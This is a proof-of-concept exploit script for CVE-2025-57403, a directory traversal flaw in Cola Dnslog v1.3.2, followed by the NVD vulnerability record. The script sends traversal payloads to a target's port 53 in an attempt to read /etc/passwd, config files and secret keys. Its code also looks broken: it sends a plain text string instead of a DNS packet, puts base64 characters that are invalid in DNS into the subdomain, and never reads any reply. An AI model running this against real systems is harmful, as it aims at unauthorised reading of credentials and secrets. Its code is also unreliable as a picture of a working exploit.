CVE-2025-57403

# CVE-2025-57403 PoC - Cola Dnslog Directory Traversal # Target: Cola Dnslog v1.3.2 # Vulnerability: Directory Traversal via DNS TXT record query import socket import base64 def exploit_cola_dnslog(target_ip, target_domain, file_path): """ Exploit directory traversal vulnerability in Cola Dnslog by sending malicious DNS TXT record queries """ # Construct malicious subdomain with path traversal # Try to read sensitive files like /etc/passwd traversal_payload = "../../../../.." + file_path # Encode to make it valid subdomain encoded_payload = base64.b64encode(traversal_payload.encode()).decode() # Create malicious DNS query malicious_subdomain = f"{encoded_payload}.{target_domain}" print(f"[*] Target: {target_ip}") print(f"[*] Malicious subdomain: {malicious_subdomain}") print(f"[*] Attempting to read: {file_path}") try: # Send DNS TXT query query = f"TXT {malicious_subdomain}" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(query.encode(), (target_ip, 53)) print("[+] Malicious DNS query sent") sock.close() except Exception as e: print(f"[-] Error: {e}") def verify_vulnerability(target_ip, target_domain): """ Verify if the target is vulnerable """ print("=" * 50) print("CVE-2025-57403 Verification") print("=" * 50) # Test files to read test_files = [ "/etc/passwd", "/etc/hosts", "/app/config.py", "/app/secret.key" ] for file_path in test_files: exploit_cola_dnslog(target_ip, target_domain, file_path) # Example usage if __name__ == "__main__": target_ip = "<target_ip>" target_domain = "dnslog.example.com" verify_vulnerability(target_ip, target_domain)

{"cve": {"id": "CVE-2025-57403", "sourceIdentifier": "[email protected]", "published": "2025-12-26T16:15:43.963", "lastModified": "2026-01-09T20:47:23.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cola Dnslog v1.3.2 is vulnerable to Directory Traversal. When a DNS query for a TXT record is processed, the application concatenates the requested URL (or a portion of it) directly with a base path using os.path.join. This bypass allows directory traversal or absolute path injection, leading to the potential exposure of sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:abelche:cola_dnslog:1.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDF381CB-2528-4BEE-B2BE-54A09FDB8430"}]}]}], "references": [{"url": "https://gist.github.com/Captaince/99b728c792c72b2666c2400625702df0", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/AbelChe/cola_dnslog/issues/29", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}